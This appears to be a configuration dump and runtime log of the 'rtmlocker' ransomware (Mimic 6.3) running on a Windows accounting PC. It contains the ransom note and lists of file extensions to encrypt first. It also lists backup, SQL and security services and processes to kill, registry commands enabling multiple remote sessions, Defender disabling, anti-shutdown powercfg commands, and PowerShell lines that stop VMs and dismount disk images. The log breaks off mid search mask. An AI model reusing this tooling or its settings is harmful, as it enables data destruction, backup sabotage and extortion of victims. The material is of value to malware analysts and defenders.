25=C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\rtmlocker.exe
27=sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff;
29=steamapps;Cache;Boot;Chrome;Firefox;Mozilla;Mozilla Firefox;MicrosoftEdge;Internet Explorer;Tor Browser;Opera;Opera Software;Common Files;Config.Msi;Intel;Microsoft;Microsoft Shared;Microsoft.NET;MSBuild;MSOCache;Packages;PerfLogs;ProgramData;System Volume Information;tmp;Temp;USOShared;Windows;Windows Defender;Windows Journal;Windows NT;Windows Photo Viewer;Windows Security;Windows.old;WindowsApps;WindowsPowerShell;WINNT;$RECYCLE.BIN;$WINDOWS.~BT;$Windows.~WS;:\Users\Public\;:\Users\Default\;
31=AcronisAgent;ARSM;backup;BackupExecAgentAccelerator;BackupExecAgentBrowser;BackupExecDiveciMediaService;BackupExecJobEngine;BackupExecManagementService;BackupExecRPCService;BackupExecVSSProvider;CAARCUpdateSvc;CASAD2DWebSvc;ccEvtMgr;ccSetMgr;Culserver;dbeng8;dbsrv12;DefWatch;FishbowlMySQL;GxBlr;GxCIMgr;GxCVD;GxFWD;GxVss;memtas;mepocs;msexchange;MSExchange$;msftesql-Exchange;msmdsrv;MSSQL;MSSQL$;MSSQL$KAV_CS_ADMIN_KIT;MSSQL$MICROSOFT##SSEE;MSSQL$MICROSOFT##WID;MSSQL$SBSMONITORING;MSSQL$SHAREPOINT;MSSQL$VEEAMSQL2012;MSSQLFDLauncher$SBSMONITORING;MSSQLFDLauncher$SHAREPOINT;MSSQLServerADHelper100;MVArmor;MVarmor64;svc$;sophos;RTVscan;MySQL57;PDVFSService;QBCFMonitorService;QBFCService;QBIDPService;QBVSS;SavRoam;SQL;SQLADHLP;sqlagent;SQLAgent$KAV_CS_ADMIN_KIT;SQLAgent$SBSMONITORING;SQLAgent$SHAREPOINT;SQLAgent$VEEAMSQL2012;sqlbrowser;Sqlservr;SQLWriter;stc_raw_agent;tomcat6;veeam;VeeamDeploymentService;VeeamNFSSvc;VeeamTransportSvc;vmware-converter;vmware-usbarbitator64;VSNAPVSS;vss;wrapper;WSBExchange;YooBackup;YooIT;
32=agntsvc;AutodeskDesktopApp;axlbridge;bedbh;benetns;bengien;beserver;CoreSync;Creative Cloud;dbeng50;dbsnmp;encsvc;EnterpriseClient;fbguard;fbserver;fdhost;fdlauncher;httpd;isqlplussvc;msaccess;MsDtSrvr;msftesql;mspub;mydesktopqos;mydesktopservice;mysqld;mysqld-nt;mysqld-opt;ocautoupds;ocomm;ocssd;oracle;pvlsvr;node;java;python;wpython;QBDBMgr;QBDBMgrN;QBIDPService;qbupdate;QBW32;QBW64;Raccine;Raccine_x86;RaccineElevatedCfg;RaccineSettings;VeeamDeploymentSvc;RAgui;raw_agent_svc;SimplyConnectionManager;sqbcoreservice;sql;sqlagent;sqlbrowser;sqlmangr;sqlservr;sqlwriter;Ssms;Sysmon;Sysmon64;tbirdconfig;tomcat6;vsnapvss;vxmon;wdswfsafe;wsa_service;wxServer;wxServerView;xfssvccon;1cv8s;1cv8;1cv8c;
33=add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f;reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f;
63=Rtmlocker Ransomware!!!\nATTENTION!\nYOUR PERSONAL DECRYPTION ID - ID_PLACEHOLDER\nAt the moment, your system is not protected.\nWe can fix it and restore your files.\nTo get started, send 1-2 small files to decrypt them as proof\nYou can trust us after opening them\n2.Do not use free programs to unlock.\nOUR CONTACTS:\nrtmlocker@proton.me
[13:45:15] Mimic 6.3
[13:45:15] [*] SysInfo...
[13:45:15] ======== SYSTEM INFO ========
[13:45:15] WIN ARCH: x64
[13:45:15] WIN VER: 10.0.22631
[13:45:15] CORE COUNT: 2
[13:45:15] MEM TOTAL: 11972 Mb.
[13:45:15] MEM AVAIL: 7001 Mb.
[13:45:15] IS DOMAIN: No
[13:45:15] LOCAL SYS: No
[13:45:15] ELEVATED: Yes
[13:45:15] HAS ADMIN: Yes
[13:45:15] PC NAME: CONTABILIDAD
[13:45:15] USER NAME: ferre
[13:45:15] IN GROUPS:
[13:45:15] <Integrity> Etiqueta obligatoria\Nivel obligatorio alto
[13:45:15] Todos
[13:45:15] NT AUTHORITY\Cuenta local y miembro del grupo de administradores
[13:45:15] BUILTIN\Administradores
[13:45:15] BUILTIN\Usuarios
[13:45:15] NT AUTHORITY\INTERACTIVE
[13:45:15] INICIO DE SESIÓN EN LA CONSOLA
[13:45:15] NT AUTHORITY\Usuarios autentificados
[13:45:15] NT AUTHORITY\Esta compañía
[13:45:15] MicrosoftAccount\*******@******.com
[13:45:15] NT AUTHORITY\Cuenta local
[13:45:15] NT AUTHORITY\LogonSessionId_0_1168521
[13:45:15] LOCAL
[13:45:15] NT AUTHORITY\Autenticación de cuentas en la nube
[13:45:15] =============================
[13:45:15] CMDLINE: "C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\rtmlocker.exe"
[13:45:15] [*] Set Privileges...
[13:45:15] [*] 24 privileges granted, 0 failed.
[13:45:15] [*] Priority...
[13:45:15] [*] Autostart...
[13:45:15] [*] Relaunch...
[13:45:15] [*] CLONE INFO: I'm a clone!
[13:45:15] =============================
[13:45:15] [*] Register hotkey...
[13:45:15] [*] Everything Setup...
[13:45:15] [*] Change Process DACL...
[13:45:15] [*] Set current dir...
[13:45:15] [*] Scanning user context mapped drives...
[13:45:15] [+] SetThreadToken success. Handle: 788
[13:45:15] =============================
[13:45:15] [*] Found 2 drives:
[13:45:15] [*] C:\ - 63674 Mb. occupy (NTFS) (FIXED) (Label: Windows)
[13:45:15] [*] D:\ - 8835 Mb. occupy (NTFS) (FIXED) (Label: Data)
[13:45:15] [*] \\?\Volume{53c3d83f-8af8-4376-b16c-791eec0d5cd3}\ - 0 Mb. occupy () (HIDDEN) (Label: )
[13:45:15] [*] \\?\Volume{ed2c760d-9c10-4768-bb7f-cf7abc08fda3}\ - 0 Mb. occupy () (HIDDEN) (Label: )
[13:45:15] =============================
[13:45:15] [+] Success run: C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\gui40.exe (pid:8248)
[13:45:15] [*] Wait gui
[13:45:16] [+] Success run: "C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\Everything.exe" -startup (pid:13160)
[13:45:17] [*] Found gui. Handle: 919284
[13:45:17] Waiting for signal to continue
[13:45:29] Start hidden shares scan
[13:45:29] [*] Current IP: 192.168.10.128
[13:45:29] [*] Adapter Name: {A61BFF2A-06F2-4954-A803-A8BC50D67F24}
[13:45:29] [*] IP Address: 192.168.10.128
[13:45:29] [*] Gateway: 192.168.10.1
[13:45:29] [*] Adapter Name: {0CD8540B-3BEC-458A-AB0A-255A65E18F1B}
[13:45:29] [*] IP Address: 0.0.0.0
[13:45:29] [*] Gateway: 0.0.0.0
[13:45:29] [*] Adapter Name: {A230D696-EA94-4D58-A2D0-3BCA64A9B8AE}
[13:45:29] [*] IP Address: 0.0.0.0
[13:45:29] [*] Gateway: 0.0.0.0
[13:45:29] [*] Adapter Name: {1665F22F-CE31-4ABE-A138-5BA8B58EF9CE}
[13:45:29] [*] IP Address: 0.0.0.0
[13:45:29] [*] Gateway: 0.0.0.0
[13:45:29] [*] Adapter Name: {55F1A2A8-E03B-4570-9AE5-2ED6AFABD9B5}
[13:45:29] [*] IP Address: 0.0.0.0
[13:45:29] [*] Gateway: 0.0.0.0
[13:45:29] [*] Adapter Name: {A7D79F7D-52D8-4503-AB32-4DDAB13F905A}
[13:45:29] [*] IP Address: 0.0.0.0
[13:45:29] [*] Gateway: 0.0.0.0
[13:45:29] [*] ARP: 192.168.10.0
[13:45:29] [*] ARP: 192.168.100.0
[13:45:29] [*] CreateHostTable...
[13:45:29] [*] ScanHosts start. First address: 192.168.10.0
[13:45:29] [*] ScanHosts completed. Last address: 192.168.10.254
[13:45:59] [*] CreateHostTable...
[13:45:59] [*] ScanHosts start. First address: 192.168.100.0
[13:45:59] [*] ScanHosts completed. Last address: 192.168.100.254
[13:46:29] [*] AddHost: 255.255.255.255
[13:46:30] Hidden shares scan completed
[13:48:37] Waiting for signal to terminate
[13:48:37] [*] Backup session key success
[13:48:37] [*] Protect directory...: C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B
[13:48:37] [*] Using settings:
[13:48:37] [*] ------------------
[13:48:37] [*] NoteId: 85-Ws1GO20K9PY4_UdCE78b67Uek9DwXHshValgIYDg*exe
[13:48:37] [*] Keys count: 11153
[13:48:37] [*] Encrypt percent: 1 %
[13:48:37] [*] % for files: 2 MiB
[13:48:37] [*] Extension: exe
[13:48:37] [*] Note file name: rtmlocker_DECRYPTION.txt
[13:48:37] [*] File max size (stage1): 0 KiB
[13:48:37] [*] File max size (global): 0 KiB
[13:48:37] [*] Process max RAM: 0 MiB
[13:48:37] [*] Self delete: yes
[13:48:37] [*] Priority modify: yes
[13:48:37] [*] Log check sum: no
[13:48:37] [*] Encrypt single: no
[13:48:37] [*] Encrypt local: yes
[13:48:37] [*] Encrypt net drive: yes
[13:48:37] [*] Encrypt net prio: yes
[13:48:37] [*] Encrypt share: yes
[13:48:37] [*] Encrypt hidden dr: yes
[13:48:37] [*] Anti-Kill protect: no
[13:48:37] [*] Disable defender: yes
[13:48:37] [*] Visible: no
[13:48:37] [*] Wipe drives: yes
[13:48:37] [*] Log level: 3
[13:48:37] [*] Delete log at end: yes
[13:48:37] [*] Use Everything: yes
[13:48:37] [*] Kill Telemetry: yes
[13:48:37] [*] Kill Backup & SQL: yes
[13:48:37] [*] Disable UAC: yes
[13:48:37] [*] Disable Recovery: yes
[13:48:37] [*] Unmount Virt Drv: yes
[13:48:37] [*] Search Hid Shares: yes
[13:48:37] [*] Block task man: yes
[13:48:37] [*] Block shutdown: yes
[13:48:37] [*] Local threads: 2
[13:48:37] [*] Network threads: 2
[13:48:37] [*] User threads: 2
[13:48:37] [*] Reserve mode: None
[13:48:37] [*] Ext. priority: sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff;
[13:48:37] [*] Ext. exclude: exe;386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp;
[13:48:37] [*] Files exclude: desktop.ini;iconcache.db;thumbs.db;ntuser.ini;boot.ini;ntdetect.com;ntldr;NTUSER.DAT;bootmgr;BOOTNXT;BOOTTGT;session.tmp;rtmlocker_DECRYPTION.txt;
[13:48:37] [*] Dirs exclude: steamapps;Cache;Boot;Chrome;Firefox;Mozilla;Mozilla Firefox;MicrosoftEdge;Internet Explorer;Tor Browser;Opera;Opera Software;Common Files;Config.Msi;Intel;Microsoft;Microsoft Shared;Microsoft.NET;MSBuild;MSOCache;Packages;PerfLogs;ProgramData;System Volume Information;tmp;Temp;USOShared;Windows;Windows Defender;Windows Journal;Windows NT;Windows Photo Viewer;Windows Security;Windows.old;WindowsApps;WindowsPowerShell;WINNT;$RECYCLE.BIN;$WINDOWS.~BT;$Windows.~WS;:\Users\Public\;:\Users\Default\;C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B;
[13:48:37] [*] Exec commands: add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f;reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f;
[13:48:37] [*] Kill proc: agntsvc.exe;AutodeskDesktopApp.exe;axlbridge.exe;bedbh.exe;benetns.exe;bengien.exe;beserver.exe;CoreSync.exe;Creative Cloud.exe;dbeng50.exe;dbsnmp.exe;encsvc.exe;EnterpriseClient.exe;fbguard.exe;fbserver.exe;fdhost.exe;fdlauncher.exe;httpd.exe;isqlplussvc.exe;msaccess.exe;MsDtSrvr.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ocautoupds.exe;ocomm.exe;ocssd.exe;oracle.exe;pvlsvr.exe;node.exe;java.exe;python.exe;wpython.exe;QBDBMgr.exe;QBDBMgrN.exe;QBIDPService.exe;qbupdate.exe;QBW32.exe;QBW64.exe;Raccine.exe;Raccine_x86.exe;RaccineElevatedCfg.exe;RaccineSettings.exe;VeeamDeploymentSvc.exe;RAgui.exe;raw_agent_svc.exe;SimplyConnectionManager.exe;sqbcoreservice.exe;sql.exe;sqlagent.exe;sqlbrowser.exe;sqlmangr.exe;sqlservr.exe;sqlwriter.exe;Ssms.exe;Sysmon.exe;Sysmon64.exe;tbirdconfig.exe;tomcat6.exe;vsnapvss.exe;vxmon.exe;wdswfsafe.exe;wsa_service.exe;wxServer.exe;wxServerView.exe;xfssvccon.exe;1cv8s.exe;1cv8.exe;1cv8c.exe;
[13:48:37] [*] Kill service: AcronisAgent;ARSM;backup;BackupExecAgentAccelerator;BackupExecAgentBrowser;BackupExecDiveciMediaService;BackupExecJobEngine;BackupExecManagementService;BackupExecRPCService;BackupExecVSSProvider;CAARCUpdateSvc;CASAD2DWebSvc;ccEvtMgr;ccSetMgr;Culserver;dbeng8;dbsrv12;DefWatch;FishbowlMySQL;GxBlr;GxCIMgr;GxCVD;GxFWD;GxVss;memtas;mepocs;msexchange;MSExchange$;msftesql-Exchange;msmdsrv;MSSQL;MSSQL$;MSSQL$KAV_CS_ADMIN_KIT;MSSQL$MICROSOFT##SSEE;MSSQL$MICROSOFT##WID;MSSQL$SBSMONITORING;MSSQL$SHAREPOINT;MSSQL$VEEAMSQL2012;MSSQLFDLauncher$SBSMONITORING;MSSQLFDLauncher$SHAREPOINT;MSSQLServerADHelper100;MVArmor;MVarmor64;svc$;sophos;RTVscan;MySQL57;PDVFSService;QBCFMonitorService;QBFCService;QBIDPService;QBVSS;SavRoam;SQL;SQLADHLP;sqlagent;SQLAgent$KAV_CS_ADMIN_KIT;SQLAgent$SBSMONITORING;SQLAgent$SHAREPOINT;SQLAgent$VEEAMSQL2012;sqlbrowser;Sqlservr;SQLWriter;stc_raw_agent;tomcat6;veeam;VeeamDeploymentService;VeeamNFSSvc;VeeamTransportSvc;vmware-converter;vmware-usbarbitator64;VSNAPVSS;vss;wrapper;WSBExchange;YooBackup;YooIT;
[13:48:37] [*] List of paths to handle:
[13:48:37] [x] C:\
[13:48:37] [x] D:\
[13:48:37] [x] \\?\Volume{53c3d83f-8af8-4376-b16c-791eec0d5cd3}\
[13:48:37] [x] \\?\Volume{ed2c760d-9c10-4768-bb7f-cf7abc08fda3}\
[13:48:37] [*] Block defender...
[13:48:37] [+] Success run: cmd.exe /c DC.exe /D (pid:8812)
[13:48:37] [*] Establishing IPC connection...
[13:48:37] [*] Run Watcher...
[13:48:37] [+] Success run: "C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\rtmlocker.exe" -e watch -pid 7488 -! (pid:12348)
[13:48:37] [*] Unlocker1...
[13:48:37] [+] Success run: "C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\rtmlocker.exe" -e ul1 (pid:7128)
[13:48:37] [*] Unlocker2...
[13:48:38] [+] Success run: "C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B\rtmlocker.exe" -e ul2 (pid:2880)
[13:48:38] [*] Get Whitelist...
[13:48:38] [*] Added service: MSSQL$WORLDOFFICE
[13:48:38] [*] Added service: MSSQLServerADHelper
[13:48:38] [*] Added service: SQLBrowser
[13:48:38] [*] Added service: SQLWriter
[13:48:38] [*] Added service: WOBackupService
[13:48:38] [*] Added service: CloudBackupRestoreSvc_1220b8
[13:48:38] [*] Kill Services...
[13:48:38] [*] Service: WSearch
[13:48:38] [*] Service: pla
[13:48:38] [*] Service: DusmSvc
[13:48:38] [*] Service: defragsvc
[13:48:38] [*] Service: DoSvc
[13:48:38] [*] Service: wercplsupport
[13:48:38] [*] Service: SDRSVC
[13:48:38] [*] Service: TroubleshootingSvc
[13:48:38] [*] Service: Wecsvc
[13:48:38] [*] Service: fhsvc
[13:48:38] [*] Service: wbengine
[13:48:38] [*] Service: PcaSvc
[13:48:38] [*] Service: WerSvc
[13:48:38] [*] Service: SENS
[13:48:38] [*] Service: AppIDSvc
[13:48:38] [*] Service: BITS
[13:48:38] [*] Service: wuauserv
[13:48:38] [*] Service: SysMain
[13:48:38] [*] Service: DiagTrack
[13:48:38] [*] Service: diagnosticshub.standardcollector.service
[13:48:38] [*] Service: dmwappushservice
[13:48:38] [*] Service: WMPNetworkSvc
[13:48:38] [*] Service: DiagTrack
[13:48:38] [*] Kill Services list (no wait)...
[13:48:38] [*] Service: sqlbrowser
[13:48:38] [*] Service: SQLWriter
[13:48:38] [*] Service: vss
[13:48:38] [*] Service: MSSQL$WORLDOFFICE
[13:48:38] [*] Service: MSSQLServerADHelper
[13:48:38] [*] Service: SQLBrowser
[13:48:38] [*] Service: SQLWriter
[13:48:38] [*] Service: WOBackupService
[13:48:38] [*] Service: CloudBackupRestoreSvc_1220b8
[13:48:38] [*] Kill Services list (wait)...
[13:48:38] [*] Service: sqlbrowser
[13:48:38] [*] Service: SQLWriter
[13:48:38] [*] Service: vss
[13:48:38] [*] Service: MSSQL$WORLDOFFICE
[13:48:38] [*] Service: MSSQLServerADHelper
[13:48:38] [*] Service: SQLBrowser
[13:48:38] [*] Service: SQLWriter
[13:48:38] [*] Service: WOBackupService
[13:48:38] [*] Service: CloudBackupRestoreSvc_1220b8
[13:48:38] [*] Kill process list...
[13:48:38] [*] Kill process telemetry...
[13:48:38] [*] Process: SearchIndexer.exe
[13:48:38] [*] Kill process with high RAM...
[13:48:38] [*] Kill process backup & sql...
[13:48:40] [*] Anti-Kill...
[13:48:40] [*] Anti-Shutdown...
[13:48:40] [+] Success run: powercfg.exe -H off (pid:13016)
[13:48:40] [+] Success run: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0 (pid:12948)
[13:48:40] [+] Success run: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0 (pid:11788)
[13:48:40] [+] Success run: powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0 (pid:8640)
[13:48:40] [+] Success run: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0 (pid:84)
[13:48:40] [+] Success run: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0 (pid:11556)
[13:48:40] [+] Success run: powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0 (pid:2464)
[13:48:40] [+] Success run: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0 (pid:3700)
[13:48:40] [+] Success run: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0 (pid:2156)
[13:48:41] [+] Success run: powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0 (pid:8396)
[13:48:41] [+] Success run: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0 (pid:3528)
[13:48:41] [+] Success run: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0 (pid:12868)
[13:48:41] [+] Success run: powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0 (pid:4444)
[13:48:41] [+] Success run: powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c (pid:2440)
[13:48:41] [+] Success run: powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61 (pid:13032)
[13:48:41] [*] Long Path support...
[13:48:41] [*] Kill Telemetry policy...
[13:48:41] [*] UAC...
[13:48:41] Remove command line restrictions...
[13:48:41] Unmount virtual drives and images...
[13:48:41] [+] Success run: powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM" (pid:8960)
[13:48:41] [+] Success run: powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage" (pid:12556)
[13:48:41] [+] Success run: powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage" (pid:13296)
[13:48:41] [*] Local threads...
[13:48:41] [*] Network shares threads...
[13:48:41] [+] SetThreadToken success. Handle: 788
[13:48:41] [+] SetThreadToken success. Handle: 788
[13:48:44] [*] Enumeration drives...
[13:48:44] [*] Waiting for local search...
[13:48:44] [*] Starting search with Everything...
[13:48:44] [*] Everything EnumResult of progressbar on drive: C:\
[13:48:44] [*] Search mask: <file:><nocase:><path:C:\><!ext:exe;386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:48:44] [*] Everything SetSearch...
[13:48:44] [*] Everything SetRequestFlags...
[13:48:44] [*] Everything SetSort...
[13:48:45] [*] Everything Query...
[13:48:45] [*] Progressbar on drive C:\ files count: 18318
[13:48:45] [*] Everything EnumResult of progressbar on drive: D:\
[13:48:45] [*] Search mask: <file:><nocase:><path:D:\><!ext:exe;386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp>file:<!endwith:exe><!"\steamapps\" !"\Cache\" !"\Boot\" !"\Chrome\" !"\Firefox\" !"\Mozilla\" !"\Mozilla Firefox\" !"\MicrosoftEdge\" !"\Internet Explorer\" !"\Tor Browser\" !"\Opera\" !"\Opera Software\" !"\Common Files\" !"\Config.Msi\" !"\Intel\" !"\Microsoft\" !"\Microsoft Shared\" !"\Microsoft.NET\" !"\MSBuild\" !"\MSOCache\" !"\Packages\" !"\PerfLogs\" !"\ProgramData\" !"\System Volume Information\" !"\tmp\" !"\Temp\" !"\USOShared\" !"\Windows\" !"\Windows Defender\" !"\Windows Journal\" !"\Windows NT\" !"\Windows Photo Viewer\" !"\Windows Security\" !"\Windows.old\" !"\WindowsApps\" !"\WindowsPowerShell\" !"\WINNT\" !"\$RECYCLE.BIN\" !"\$WINDOWS.~BT\" !"\$Windows.~WS\" !":\Users\Public\" !":\Users\Default\" !"C:\Users\ferre\AppData\Local\0F983A3D-FC63-C07E-6477-E3A5238DEF4B">wholefilename:<!"desktop.ini" !"iconcache.db" !"thumbs.db" !"ntuser.ini" !"boot.ini" !"ntdetect.com" !"ntldr" !"NTUSER.DAT" !"bootmgr" !"BOOTNXT" !"BOOTTGT" !"session.tmp" !"rtmlocker_DECRYPTION.txt"><!size:0>
[13:48:45] [*] Everything SetSearch...
[13:48:45] [*] Everything SetRequestFlags...
[13:48:45] [*] Everything SetSort...
[13:48:46] [*] Everything Query...
[13:48:46] [*] Progressbar on drive D:\ files count: 2987
[13:48:46] [*] Everything EnumResult of priority ext on drive: C:\
[13:48:46] [*] Search mask: <file:><nocase:><path:C:\><ext:;sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv